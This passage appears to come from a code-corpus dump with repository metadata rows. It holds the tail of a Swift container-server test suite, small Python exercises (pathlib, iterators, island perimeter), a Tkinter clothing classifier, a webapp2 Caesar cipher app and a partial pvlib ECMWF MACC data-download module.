'/sda1/p/a/c?prefix=US-&delimiter=-&format=xml',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(
resp.body, '<?xml version="1.0" encoding="UTF-8"?>'
'\n<container name="c"><subdir name="US-OK-">'
'<name>US-OK-</name></subdir>'
'<subdir name="US-TX-"><name>US-TX-</name></subdir>'
'<subdir name="US-UT-"><name>US-UT-</name></subdir></container>')
def test_GET_delimiter_xml_with_quotes(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
req = Request.blank(
'/sda1/p/a/c/<\'sub\' "dir">/object',
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?delimiter=/&format=xml',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
dom = minidom.parseString(resp.body)
self.assert_(len(dom.getElementsByTagName('container')) == 1)
container = dom.getElementsByTagName('container')[0]
self.assert_(len(container.getElementsByTagName('subdir')) == 1)
subdir = container.getElementsByTagName('subdir')[0]
self.assertEquals(unicode(subdir.attributes['name'].value),
u'<\'sub\' "dir">/')
self.assert_(len(subdir.getElementsByTagName('name')) == 1)
name = subdir.getElementsByTagName('name')[0]
self.assertEquals(unicode(name.childNodes[0].data),
u'<\'sub\' "dir">/')
def test_GET_path(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('US/TX', 'US/TX/B', 'US/OK', 'US/OK/B', 'US/UT/A'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?path=US&format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(
simplejson.loads(resp.body),
[{"name": "US/OK", "hash": "x", "bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"},
{"name": "US/TX", "hash": "x", "bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"}])
def test_GET_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'GET',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_through_call(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '404 ')
def test_through_call_invalid_path(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/bob',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '400 ')
def test_through_call_invalid_path_utf8(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '\x00',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '412 ')
def test_invalid_method_doesnt_exist(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'method_doesnt_exist',
'PATH_INFO': '/sda1/p/a/c'},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '405 ')
def test_invalid_method_is_not_public(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': '__init__',
'PATH_INFO': '/sda1/p/a/c'},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '405 ')
def test_params_format(self):
req = Request.blank(
'/sda1/p/a/c',
headers={'X-Timestamp': normalize_timestamp(1)},
environ={'REQUEST_METHOD': 'PUT'})
req.get_response(self.controller)
for format in ('xml', 'json'):
req = Request.blank('/sda1/p/a/c?format=%s' % format,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 200)
def test_params_utf8(self):
# Bad UTF8 sequence, all parameters should cause 400 error
for param in ('delimiter', 'limit', 'marker', 'path', 'prefix',
'end_marker', 'format'):
req = Request.blank('/sda1/p/a/c?%s=\xce' % param,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400,
"%d on param %s" % (resp.status_int, param))
# Good UTF8 sequence for delimiter, too long (1 byte delimiters only)
req = Request.blank('/sda1/p/a/c?delimiter=\xce\xa9',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 412,
"%d on param delimiter" % (resp.status_int))
req = Request.blank('/sda1/p/a/c',
headers={'X-Timestamp': normalize_timestamp(1)},
environ={'REQUEST_METHOD': 'PUT'})
req.get_response(self.controller)
# Good UTF8 sequence, ignored for limit, doesn't affect other queries
for param in ('limit', 'marker', 'path', 'prefix', 'end_marker',
'format'):
req = Request.blank('/sda1/p/a/c?%s=\xce\xa9' % param,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204,
"%d on param %s" % (resp.status_int, param))
def test_put_auto_create(self):
headers = {'x-timestamp': normalize_timestamp(1),
'x-size': '0',
'x-content-type': 'text/plain',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e'}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/.a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/.c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/.o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_delete_auto_create(self):
headers = {'x-timestamp': normalize_timestamp(1)}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/.a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/.c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/a/.c/.o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_content_type_on_HEAD(self):
Request.blank('/sda1/p/a/o',
headers={'X-Timestamp': normalize_timestamp(1)},
environ={'REQUEST_METHOD': 'PUT'}).get_response(
self.controller)
env = {'REQUEST_METHOD': 'HEAD'}
req = Request.blank('/sda1/p/a/o?format=xml', environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank('/sda1/p/a/o?format=json', environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank('/sda1/p/a/o', environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/o', headers={'Accept': 'application/json'}, environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/o', headers={'Accept': 'application/xml'}, environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
self.assertEquals(resp.charset, 'utf-8')
def test_updating_multiple_container_servers(self):
http_connect_args = []
def fake_http_connect(ipaddr, port, device, partition, method, path,
headers=None, query_string=None, ssl=False):
class SuccessfulFakeConn(object):
@property
def status(self):
return 200
def getresponse(self):
return self
def read(self):
return ''
captured_args = {'ipaddr': ipaddr, 'port': port,
'device': device, 'partition': partition,
'method': method, 'path': path, 'ssl': ssl,
'headers': headers, 'query_string': query_string}
http_connect_args.append(
dict((k, v) for k, v in captured_args.iteritems()
if v is not None))
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'X-Account-Partition': '30',
'X-Account-Host': '1.2.3.4:5, 6.7.8.9:10',
'X-Account-Device': 'sdb1, sdf1'})
orig_http_connect = container_server.http_connect
try:
container_server.http_connect = fake_http_connect
req.get_response(self.controller)
finally:
container_server.http_connect = orig_http_connect
http_connect_args.sort(key=operator.itemgetter('ipaddr'))
self.assertEquals(len(http_connect_args), 2)
self.assertEquals(
http_connect_args[0],
{'ipaddr': '1.2.3.4',
'port': '5',
'path': '/a/c',
'device': 'sdb1',
'partition': '30',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-bytes-used': 0,
'x-delete-timestamp': '0',
'x-object-count': 0,
'x-put-timestamp': '0000012345.00000',
'referer': 'PUT http://localhost/sda1/p/a/c',
'user-agent': 'container-server %d' % os.getpid(),
'x-trans-id': '-'})})
self.assertEquals(
http_connect_args[1],
{'ipaddr': '6.7.8.9',
'port': '10',
'path': '/a/c',
'device': 'sdf1',
'partition': '30',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-bytes-used': 0,
'x-delete-timestamp': '0',
'x-object-count': 0,
'x-put-timestamp': '0000012345.00000',
'referer': 'PUT http://localhost/sda1/p/a/c',
'user-agent': 'container-server %d' % os.getpid(),
'x-trans-id': '-'})})
def test_serv_reserv(self):
# Test replication_server flag was set from configuration file.
container_controller = container_server.ContainerController
conf = {'devices': self.testdir, 'mount_check': 'false'}
self.assertEquals(container_controller(conf).replication_server, None)
for val in [True, '1', 'True', 'true']:
conf['replication_server'] = val
self.assertTrue(container_controller(conf).replication_server)
for val in [False, 0, '0', 'False', 'false', 'test_string']:
conf['replication_server'] = val
self.assertFalse(container_controller(conf).replication_server)
def test_list_allowed_methods(self):
# Test list of allowed_methods
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST']
repl_methods = ['REPLICATE']
for method_name in obj_methods:
method = getattr(self.controller, method_name)
self.assertFalse(hasattr(method, 'replication'))
for method_name in repl_methods:
method = getattr(self.controller, method_name)
self.assertEquals(method.replication, True)
def test_correct_allowed_method(self):
# Test correct work for allowed method using
# swift.container.server.ContainerController.__call__
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
self.controller = container_server.ContainerController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'})
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
method_res = mock.MagicMock()
mock_method = public(lambda x: mock.MagicMock(return_value=method_res))
with mock.patch.object(self.controller, method, new=mock_method):
response = self.controller.__call__(env, start_response)
self.assertEqual(response, method_res)
def test_not_allowed_method(self):
# Test correct work for NOT allowed method using
# swift.container.server.ContainerController.__call__
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
self.controller = container_server.ContainerController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'})
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
answer = ['<html><h1>Method Not Allowed</h1><p>The method is not '
'allowed for this resource.</p></html>']
mock_method = replication(public(lambda x: mock.MagicMock()))
with mock.patch.object(self.controller, method, new=mock_method):
response = self.controller.__call__(env, start_response)
self.assertEqual(response, answer)
if __name__ == '__main__':
unittest.main()
| [
"marvin@PC.(none)"
] | marvin@PC.(none) |
ec358af8dcc747a31d12f7fb499c7a78bba2c640 | 7701773efa258510951bc7d45325b4cca26b3a7d | /from_trans_file_cloud/explore_pathlib.py | cd6ac1e600ecf9cc21bb0408817543f804917d9b | [] | no_license | Archanciel/explore | c170b2c8b5eed0c1220d5e7c2ac326228f6b2485 | 0576369ded0e54ce7ff9596ec4df076e69067e0c | refs/heads/master | 2022-06-17T19:15:03.647074 | 2022-06-01T20:07:04 | 2022-06-01T20:07:04 | 105,314,051 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from pathlib import Path
root = Path('D:\\Development\\Python\\trans_file_cloud\\.git')
child = Path('D:\\Development\\Python\\trans_file_cloud\\.git\\hooks')
other = Path('/some/other/path')
print(root in child.parents) | [
"jp.schnyder@gmail.com"
] | jp.schnyder@gmail.com |
ae83c59eb63599eac7d7f45ea8229a239af25040 | 82f993631da2871933edf83f7648deb6c59fd7e4 | /w1/L3/7.py | 8469a86b108877706bb07df0088f4d1eea2b7434 | [] | no_license | bobur554396/PPII2021Summer | 298f26ea0e74c199af7b57a5d40f65e20049ecdd | 7ef38fb4ad4f606940d2ba3daaa47cbd9ca8bcd2 | refs/heads/master | 2023-06-26T05:42:08.523345 | 2021-07-24T12:40:05 | 2021-07-24T12:40:05 | 380,511,125 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | # - [] Iterators and Iterbales
a = [1, 2, 3, 4] # - iterable object
it = iter(a)
# print(next(it))
# print(next(it))
# print(next(it))
# print(next(it))
# print(next(it))
for i in it:
print(i)
| [
"bobur.muhsimbaev@gmail.com"
] | bobur.muhsimbaev@gmail.com |
f9a25ea75f1038ebb53730647439228ea1d83873 | 9102c3a5fa3a5b0202d61206973d0ea167f7a4d0 | /July/07-IslandPerimeter.py | a93da08ce948ac402b6597b23157a28ceea1580f | [] | no_license | Madhav-Somanath/LeetCode | 8e1b39e106cec238e5a2a3acb3eb267f5c36f781 | b6950f74d61db784095c71df5115ba10be936c65 | refs/heads/master | 2023-01-08T15:10:00.249806 | 2020-10-31T14:45:43 | 2020-10-31T14:45:43 | 255,654,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,657 | py | """ You are given a map in form of a two-dimensional integer grid where 1 represents land and 0 represents water.
Grid cells are connected horizontally/vertically (not diagonally). The grid is completely surrounded by water,
and there is exactly one island (i.e., one or more connected land cells).
The island doesn't have "lakes" (water inside that isn't connected to the water around the island). One cell is a square with side length 1.
The grid is rectangular, width and height don't exceed 100. Determine the perimeter of the island. """
# SOLUTION
class Solution:
def islandPerimeter(self, grid: List[List[int]]) -> int:
if not grid:
return 0
def sum_adjacent(i, j):
adjacent = (i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1),
res = 0
for x, y in adjacent:
if x < 0 or y < 0 or x == len(grid) or y == len(grid[0]) or grid[x][y] == 0:
res += 1
return res
count = 0
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == 1:
count += sum_adjacent(i, j)
return count
'''
m, n, Perimeter = len(grid), len(grid[0]), 0
for i in range(m):
for j in range(n):
Perimeter += 4*grid[i][j]
if i > 0: Perimeter -= grid[i][j]*grid[i-1][j]
if i < m-1: Perimeter -= grid[i][j]*grid[i+1][j]
if j > 0: Perimeter -= grid[i][j]*grid[i][j-1]
if j < n-1: Perimeter -= grid[i][j]*grid[i][j+1]
return Perimeter
''' | [
"madhav.somanath@gmail.com"
] | madhav.somanath@gmail.com |
adb7196550fdf40e9cc1626cc68f50b6734fe92d | df8029f963d8b348d83720a97fd17db693891a72 | /main.py | 916074acfa51e74fe77f065be6b2ea8a0d717a64 | [] | no_license | jonboxkc/Web-Caesar | a7a87c870d6b7d07a7335fcf82136b1651211655 | ecb51fee7619a95fdba14a4128cccd9af8476f16 | refs/heads/master | 2021-01-11T16:39:23.982116 | 2017-01-26T16:28:42 | 2017-01-26T16:28:42 | 80,133,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,717 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
import caesar
import cgi
def build_page(textarea_content):
rot_label = "<label>Rotate by: </label>"
rotation_input = "<input type = 'number' name = 'rotation'/>"
message_label = "<label>Type a message: </label>"
textarea = "<textarea name = 'message'>" + textarea_content + "</textarea>"
submit = "<input type= 'submit'/>"
form = ("<form method ='post'>" +
rot_label + rotation_input + "<br>" +
message_label + textarea + "<br>" +
submit + "</form>")
header = "<h2>Web Caesar</h2>"
return header + form
class MainHandler(webapp2.RequestHandler):
def get(self):
content = build_page("")
self.response.write(content)
def post(self):
message = self.request.get("message")
rotation = int(self.request.get("rotation"))
encrypted_message = caesar.encrypt(message,rotation)
escaped_message = cgi.escape(encrypted_message)
content = build_page(escaped_message)
self.response.write(content)
app = webapp2.WSGIApplication([
('/', MainHandler)
], debug=True)
| [
"jonharing@gmail.com"
] | jonharing@gmail.com |
e7b901806311b84a364ee6f574ac1a461ea8a62d | 8cf87938eddba925c55ba9c6d44b548cb4a918e7 | /FMNIST/app.py | 0e67430a4645cb1ef03d5178541ab97515bff98b | [] | no_license | aj-naik/MNIST-FMNIST | d850cae6fe276bf863d683de25fa4ad12288092a | 95476ef21615b9f6803464e26a5f8a95726f4ac8 | refs/heads/main | 2023-05-11T00:12:24.605579 | 2021-06-03T08:12:09 | 2021-06-03T08:12:09 | 373,411,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,735 | py | from keras.models import load_model
from tkinter import *
import tkinter as tk
import win32gui
from PIL import ImageGrab, Image
import numpy as np
model = load_model('fmnist.h5')
def predict_cloth_type(img):
img = img.resize((28,28))
img = img.convert('L')
img = np.array(img)
img = img.reshape(1,28,28,1)
img = img/255
result = model.predict([img])[0]
return np.argmax(result), max(result)
class App(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
self.x = self.y = 0
self.canvas = tk.Canvas(self, width=300, height=300, bg = "white", cursor="cross")
self.label = tk.Label(self, text="Predicting", font=("Helvetica", 48))
self.classify_btn = tk.Button(self, text = "Predict", command = self.classify_number)
self.clear_btn = tk.Button(self, text = "Clear", command = self.clear_all)
self.canvas.grid(row=0, column=0, pady=2, sticky=W, )
self.label.grid(row=0, column=1,pady=2, padx=2)
self.classify_btn.grid(row=1, column=1, pady=2, padx=2)
self.clear_btn.grid(row=1, column=0, pady=2)
self.canvas.bind("<B1-Motion>", self.draw_lines)
def clear_all(self):
self.canvas.delete("all")
def classify_number(self):
handle = self.canvas.winfo_id()
rect = win32gui.GetWindowRect(handle)
im = ImageGrab.grab(rect)
digit, acc = predict_cloth_type(im)
self.label.configure(text= str(digit)+', '+ str(int(acc*100))+'%')
def draw_lines(self, event):
self.x = event.x
self.y = event.y
r=8
self.canvas.create_oval(self.x-r, self.y-r, self.x + r, self.y + r, fill='black')
app = App()
mainloop()
| [
"51918054+aj-naik@users.noreply.github.com"
] | 51918054+aj-naik@users.noreply.github.com |
01edd8becd852d512ccc8195d2ff445ca6af7674 | 67035089f755f88e333ff1d48f06b2dbd47b8bc8 | /pvlib/iotools/ecmwf_macc.py | 18262d998762bdb9663fa1871e3d3f836a0ec4cc | [
"BSD-3-Clause"
] | permissive | JoshuaC3/pvlib-python | e47c9ef4dc3d063daad1337a9543e80db6e64d70 | 59413747047ef8390a47a537b39415f7110c55c8 | refs/heads/master | 2020-04-15T16:18:31.483246 | 2019-01-09T10:43:42 | 2019-01-09T10:43:42 | 164,829,597 | 0 | 0 | BSD-3-Clause | 2019-01-09T09:17:16 | 2019-01-09T09:17:16 | null | UTF-8 | Python | false | false | 11,349 | py | """
Read data from ECMWF MACC Reanalysis.
"""
from __future__ import division
import threading
import pandas as pd
try:
import netCDF4
except ImportError:
class netCDF4:
@staticmethod
def Dataset(*a, **kw):
raise ImportError(
'Reading ECMWF data requires netCDF4 to be installed.')
try:
from ecmwfapi import ECMWFDataServer
except ImportError:
def ECMWFDataServer(*a, **kw):
raise ImportError(
'To download data from ECMWF requires the API client.\nSee https:/'
'/confluence.ecmwf.int/display/WEBAPI/Access+ECMWF+Public+Datasets'
)
SERVER = None
else:
SERVER = ECMWFDataServer()
#: map of ECMWF MACC parameter keynames and codes used in API
PARAMS = {
"tcwv": "137.128",
"aod550": "207.210",
'aod469': '213.210',
'aod670': '214.210',
'aod865': '215.210',
"aod1240": "216.210",
}
def _ecmwf(server, startdate, stopdate, params, targetname):
# see http://apps.ecmwf.int/datasets/data/macc-reanalysis/levtype=sfc/
server.retrieve({
"class": "mc",
"dataset": "macc",
"date": "%s/to/%s" % (startdate, stopdate),
"expver": "rean",
"grid": "0.75/0.75",
"levtype": "sfc",
"param": params,
"step": "3/6/9/12/15/18/21/24",
"stream": "oper",
"format": "netcdf",
"time": "00:00:00",
"type": "fc",
"target": targetname,
})
def get_ecmwf_macc(filename, params, startdate, stopdate, lookup_params=True,
server=SERVER, target=_ecmwf):
"""
Download data from ECMWF MACC Reanalysis API.
Parameters
----------
filename : str
full path of file where to save data, ``.nc`` appended if not given
params : str or sequence of str
keynames of parameter[s] to download
startdate : datetime.datetime or datetime.date
UTC date
stopdate : datetime.datetime or datetime.date
UTC date
lookup_params : bool, default True
optional flag, if ``False``, then codes are already formatted
server : ecmwfapi.api.ECMWFDataServer
optionally provide a server object, default is given
target : callable
optional function that calls ``server.retrieve`` to pass to thread
Returns
-------
t : thread
a thread object, use it to check status by calling `t.is_alive()`
Notes
-----
To download data from ECMWF requires the API client. For more information,
see the `documentation
<https://confluence.ecmwf.int/display/WEBAPI/Access+ECMWF+Public+Datasets>`_.
This function returns a daemon thread that runs in the background. Exiting
Python will kill this thread, however this thread will not block the main
thread or other threads. This thread will terminate when the file is
downloaded or if the thread raises an unhandled exception. You may submit
multiple requests simultaneously to break up large downloads. You can also
check the status and retrieve downloads online at
http://apps.ecmwf.int/webmars/joblist/. This is useful if you kill the
thread. Downloads expire after 24 hours.
.. warning:: Your request may be queued online for an hour or more before
it begins to download
Precipitable water :math:`P_{wat}` is equivalent to the total column of
water vapor (TCWV), but the units given by ECMWF MACC Reanalysis are kg/m^2
at STP (1-atm, 25-C). Divide by ten to convert to centimeters of
precipitable water:
.. math::
P_{wat} \\left( \\text{cm} \\right) \
= TCWV \\left( \\frac{\\text{kg}}{\\text{m}^2} \\right) \
\\frac{100 \\frac{\\text{cm}}{\\text{m}}} \
{1000 \\frac{\\text{kg}}{\\text{m}^3}}
The keynames available for the ``params`` argument are given by
:const:`pvlib.iotools.ecmwf_macc.PARAMS` which maps the keys to codes used
in the API. The following keynames are available:
======= =========================================
keyname description
======= =========================================
tcwv total column water vapor in kg/m^2 at STP
aod550 aerosol optical depth measured at 550-nm
aod469 aerosol optical depth measured at 469-nm
aod670 aerosol optical depth measured at 670-nm
aod865 aerosol optical depth measured at 865-nm
aod1240 aerosol optical depth measured at 1240-nm
======= =========================================
If ``lookup_params`` is ``False`` then ``params`` must contain the codes
preformatted according to the ECMWF MACC Reanalysis API. This is useful if
you want to retrieve codes that are not mapped in
:const:`pvlib.iotools.ecmwf_macc.PARAMS`.
Specify a custom ``target`` function to modify how the ECMWF API function
``server.retrieve`` is called. The ``target`` function must have the
following signature in which the parameter definitions are similar to
:func:`pvlib.iotools.get_ecmwf_macc`. ::
target(server, startdate, stopdate, params, filename) -> None
Examples
--------
Retrieve the AOD measured at 550-nm and the total column of water vapor for
November 1, 2012.
>>> from datetime import date
>>> from pvlib.iotools import get_ecmwf_macc
>>> filename = 'aod_tcwv_20121101.nc' # .nc extension added if missing
>>> params = ('aod550', 'tcwv')
>>> start = end = date(2012, 11, 1)
>>> t = get_ecmwf_macc(filename, params, start, end)
>>> t.is_alive()
True
"""
if not filename.endswith('nc'):
filename += '.nc'
if lookup_params:
try:
params = '/'.join(PARAMS.get(p) for p in params)
except TypeError:
params = PARAMS.get(params)
startdate = startdate.strftime('%Y-%m-%d')
stopdate = stopdate.strftime('%Y-%m-%d')
if not server:
server = ECMWFDataServer()
t = threading.Thread(target=target, daemon=True,
args=(server, startdate, stopdate, params, filename))
t.start()
return t
class ECMWF_MACC(object):
"""container for ECMWF MACC reanalysis data"""
TCWV = 'tcwv' # total column water vapor in kg/m^2 at (1-atm,25-degC)
def __init__(self, filename):
self.data = netCDF4.Dataset(filename)
# data variables and dimensions
variables = set(self.data.variables.keys())
dimensions = set(self.data.dimensions.keys())
self.keys = tuple(variables - dimensions)
# size of lat/lon dimensions
self.lat_size = self.data.dimensions['latitude'].size
self.lon_size = self.data.dimensions['longitude'].size
# spatial resolution in degrees
self.delta_lat = -180.0 / (self.lat_size - 1) # from north to south
self.delta_lon = 360.0 / self.lon_size # from west to east
# time resolution in hours
self.time_size = self.data.dimensions['time'].size
self.start_time = self.data['time'][0]
self.stop_time = self.data['time'][-1]
self.time_range = self.stop_time - self.start_time
self.delta_time = self.time_range / (self.time_size - 1)
def get_nearest_indices(self, latitude, longitude):
"""
Get nearest indices to (latitude, longitude).
Parmaeters
----------
latitude : float
Latitude in degrees
longitude : float
Longitude in degrees
Returns
-------
idx_lat : int
index of nearest latitude
idx_lon : int
index of nearest longitude
"""
# index of nearest latitude
idx_lat = int(round((latitude - 90.0) / self.delta_lat))
# avoid out of bounds latitudes
if idx_lat < 0:
idx_lat = 0 # if latitude == 90, north pole
elif idx_lat > self.lat_size:
idx_lat = self.lat_size # if latitude == -90, south pole
# adjust longitude from -180/180 to 0/360
longitude = longitude % 360.0
# index of nearest longitude
idx_lon = int(round(longitude / self.delta_lon)) % self.lon_size
return idx_lat, idx_lon
def interp_data(self, latitude, longitude, utc_time, param):
"""
Interpolate ``param`` values to ``utc_time`` using indices nearest to
(``latitude, longitude``).
Parmaeters
----------
latitude : float
Latitude in degrees
longitude : float
Longitude in degrees
utc_time : datetime.datetime or datetime.date
Naive or UTC date or datetime to interpolate
param : str
Name of the parameter to interpolate from the data
Returns
-------
Interpolated ``param`` value at (``utc_time, latitude, longitude``)
Examples
--------
Use this to get a single value of a parameter in the data at a specific
time and set of (latitude, longitude) coordinates.
>>> from datetime import datetime
>>> from pvlib.iotools import ecmwf_macc
>>> data = ecmwf_macc.ECMWF_MACC('aod_tcwv_20121101.nc')
>>> dt = datetime(2012, 11, 1, 11, 33, 1)
>>> data.interp_data(38.2, -122.1, dt, 'aod550')
"""
nctime = self.data['time'] # time
ilat, ilon = self.get_nearest_indices(latitude, longitude)
